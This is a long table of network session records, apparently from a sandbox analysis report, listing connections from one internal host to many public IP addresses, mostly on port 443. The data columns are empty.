                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21250192.168.2.235285085.203.89.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21251192.168.2.2343324175.223.157.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21252192.168.2.235705069.254.238.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21253192.168.2.233934475.30.24.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21254192.168.2.2335156114.185.185.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21255192.168.2.2337222125.61.243.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21256192.168.2.2355818194.135.49.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21257192.168.2.2358344217.226.175.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21258192.168.2.2359130185.105.243.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21259192.168.2.2359554194.76.17.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21260192.168.2.2333262143.104.208.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21261192.168.2.2350618154.29.243.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21262192.168.2.2339880110.35.253.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21263192.168.2.235327225.215.86.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21264192.168.2.2338368153.233.248.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21265192.168.2.2337898146.242.35.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21266192.168.2.233510835.223.84.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21267192.168.2.233713632.136.24.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21268192.168.2.233475841.18.216.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21269192.168.2.2343384204.220.81.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21270192.168.2.235848431.65.223.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21271192.168.2.2335268203.113.154.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21272192.168.2.2354330177.234.8.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21273192.168.2.235951617.34.98.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21274192.168.2.2336234211.69.111.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21275192.168.2.235203659.90.38.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21276192.168.2.2351450113.90.193.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21277192.168.2.23444142.2.88.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21278192.168.2.2343944218.63.138.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21279192.168.2.2360166110.227.26.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21280192.168.2.235306454.12.99.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21281192.168.2.235045468.170.213.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21282192.168.2.2351816164.98.62.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21283192.168.2.2351392111.208.37.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21284192.168.2.2342560192.100.27.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21285192.168.2.2358712108.16.67.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21286192.168.2.2356962201.255.205.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21287192.168.2.235291693.121.146.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21288192.168.2.234888436.208.185.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21289192.168.2.2345482205.164.27.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21290192.168.2.2351038188.34.207.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21291192.168.2.235047277.153.48.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21292192.168.2.234753288.90.57.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21293192.168.2.2348684173.80.237.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21294192.168.2.2352814150.152.176.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21295192.168.2.2355464199.186.121.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21296192.168.2.2341964161.121.200.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21297192.168.2.2351542132.9.125.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21298192.168.2.234904280.14.4.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21299192.168.2.2354342137.123.129.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21300192.168.2.235146466.66.171.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21301192.168.2.2359964133.153.216.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21302192.168.2.2335446181.60.84.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21303192.168.2.2357142179.97.139.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21304192.168.2.2358420171.76.121.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21305192.168.2.2353268102.60.195.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21306192.168.2.2355744128.9.247.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21307192.168.2.2347778186.131.78.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21308192.168.2.234831438.84.2.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21309192.168.2.234491832.177.126.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21310192.168.2.234705224.132.248.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21311192.168.2.2351788166.232.245.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21312192.168.2.235367238.103.137.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21313192.168.2.234636068.145.120.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21314192.168.2.234758242.23.167.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21315192.168.2.235285435.12.231.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21316192.168.2.2342048210.49.144.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21317192.168.2.2345608174.48.74.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21318192.168.2.2353002213.244.164.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21319192.168.2.23523682.227.70.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21320192.168.2.234652864.186.78.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21321192.168.2.2360974130.86.137.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21322192.168.2.23538508.234.176.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21323192.168.2.2349276149.177.238.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21324192.168.2.2337826188.244.65.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21325192.168.2.233638890.85.140.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21326192.168.2.234657014.201.212.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21327192.168.2.235560285.60.72.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21328192.168.2.2344552197.72.178.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21329192.168.2.2351742119.241.32.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21330192.168.2.235561691.125.131.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21331192.168.2.2352090223.28.147.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21332192.168.2.2354758106.138.80.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21333192.168.2.2349896163.17.169.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21334192.168.2.23469081.222.23.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21335192.168.2.2346334176.145.254.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21336192.168.2.234607891.187.204.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21337192.168.2.235908470.232.26.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21338192.168.2.2355806171.94.204.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21339192.168.2.235272491.244.57.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21340192.168.2.2359408153.37.250.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21341192.168.2.233525237.197.36.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21342192.168.2.2346026147.131.31.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21343192.168.2.2354516196.39.91.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21344192.168.2.2337462205.70.56.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21345192.168.2.2339824151.241.84.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21346192.168.2.236078483.22.222.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21347192.168.2.2348652163.195.27.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21348192.168.2.2345086106.150.83.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21349192.168.2.2344206179.187.194.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21350192.168.2.2354354160.143.209.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21351192.168.2.235691857.12.203.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21352192.168.2.2348094218.235.22.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21353192.168.2.233407813.191.231.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21354192.168.2.2350206181.100.43.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21355192.168.2.2337130125.13.58.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21356192.168.2.2351808164.136.71.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21357192.168.2.235145423.194.53.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21358192.168.2.235013479.2.67.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21359192.168.2.234027842.19.167.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21360192.168.2.2337836110.177.123.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21361192.168.2.235830040.97.220.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21362192.168.2.234832863.35.150.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21363192.168.2.2352498205.143.54.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21364192.168.2.2359396115.185.46.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21365192.168.2.235674868.75.100.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21366192.168.2.2339612126.170.130.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21367192.168.2.23367661.56.230.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21368192.168.2.2345948171.187.204.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21369192.168.2.2333388156.99.216.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21370192.168.2.2354476212.8.137.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21371192.168.2.2345642156.104.213.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21372192.168.2.233753859.210.253.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21373192.168.2.235789491.10.193.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21374192.168.2.2360552222.206.159.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21375192.168.2.2342804105.254.234.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21376192.168.2.2338082133.54.134.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21377192.168.2.2352328134.127.251.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21378192.168.2.2336028117.231.163.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21379192.168.2.2349806174.207.141.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21380192.168.2.2340378213.105.156.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21381192.168.2.2348430173.164.226.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21382192.168.2.2339470114.30.169.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21383192.168.2.234303458.42.79.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21384192.168.2.236003854.39.107.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21385192.168.2.234511695.135.131.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21386192.168.2.234655413.247.188.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21387192.168.2.2335182205.188.38.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21388192.168.2.2351894183.13.49.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21389192.168.2.2344606144.9.183.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21390192.168.2.2333554159.105.217.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21391192.168.2.2349766126.187.163.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21392192.168.2.235400665.172.227.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21393192.168.2.2339964121.39.238.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21394192.168.2.2341874147.34.113.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21395192.168.2.23328745.226.169.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21396192.168.2.2359828125.140.27.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21397192.168.2.2345204207.83.129.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21398192.168.2.234009678.205.181.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21399192.168.2.2356868170.97.118.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21400192.168.2.2340640156.28.10.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21401192.168.2.2333728106.71.28.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21402192.168.2.235784624.88.49.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21403192.168.2.2351010117.167.94.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21404192.168.2.2346264223.45.168.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21405192.168.2.2350346151.40.88.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21406192.168.2.23482101.153.235.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21407192.168.2.234485874.183.215.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21408192.168.2.2354468190.160.56.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21409192.168.2.233993235.123.154.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21410192.168.2.235028644.247.29.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21411192.168.2.2359010158.79.249.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21412192.168.2.2359818141.218.76.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21413192.168.2.2353062216.185.177.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21414192.168.2.2338284171.21.10.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21415192.168.2.235903679.142.115.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21416192.168.2.234931819.190.198.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21417192.168.2.2345302104.227.168.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21418192.168.2.235201662.225.15.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21419192.168.2.233418247.89.246.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21420192.168.2.2341860165.233.19.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21421192.168.2.235797490.129.3.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21422192.168.2.2360872164.129.49.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21423192.168.2.2355300197.2.37.5637215
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21424192.168.2.234495485.26.54.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21425192.168.2.2351532196.170.127.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21426192.168.2.234586651.210.93.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21427192.168.2.235677812.167.249.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21428192.168.2.2353284223.124.160.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21429192.168.2.2352462174.116.76.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21430192.168.2.2341584188.234.19.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21431192.168.2.2353746111.59.63.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21432192.168.2.2349130162.42.34.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21433192.168.2.23371642.9.27.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21434192.168.2.2339766198.253.39.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21435192.168.2.235828477.28.128.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21436192.168.2.2346518107.245.205.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21437192.168.2.235860485.185.130.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21438192.168.2.2332812202.104.214.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21439192.168.2.234848099.33.102.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21440192.168.2.234276298.157.214.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21441192.168.2.2336406117.60.200.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21442192.168.2.2342252130.20.227.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21443192.168.2.235544839.92.38.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21444192.168.2.2347408139.132.99.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21445192.168.2.2339184219.6.137.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21446192.168.2.23535008.52.201.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21447192.168.2.23605928.53.126.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21448192.168.2.2353180153.26.167.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21449192.168.2.235722458.57.93.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21450192.168.2.2337258164.96.62.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21451192.168.2.2359340190.142.140.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21452192.168.2.235693641.240.112.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21453192.168.2.2352802208.135.194.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21454192.168.2.2341056186.98.187.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21455192.168.2.2357430208.117.237.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21456192.168.2.2339124202.225.122.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21457192.168.2.235988249.113.239.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21458192.168.2.2334072170.30.224.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21459192.168.2.2333256117.60.100.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21460192.168.2.2334266175.76.220.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21461192.168.2.2348208101.2.4.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21462192.168.2.234034054.169.134.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21463192.168.2.2344086113.205.79.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21464192.168.2.235472236.27.188.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21465192.168.2.233898662.241.173.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21466192.168.2.2336948166.110.40.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21467192.168.2.234555831.203.184.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21468192.168.2.2335090208.235.245.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21469192.168.2.235029875.116.25.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21470192.168.2.2357920178.207.213.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21471192.168.2.234204420.90.15.153443
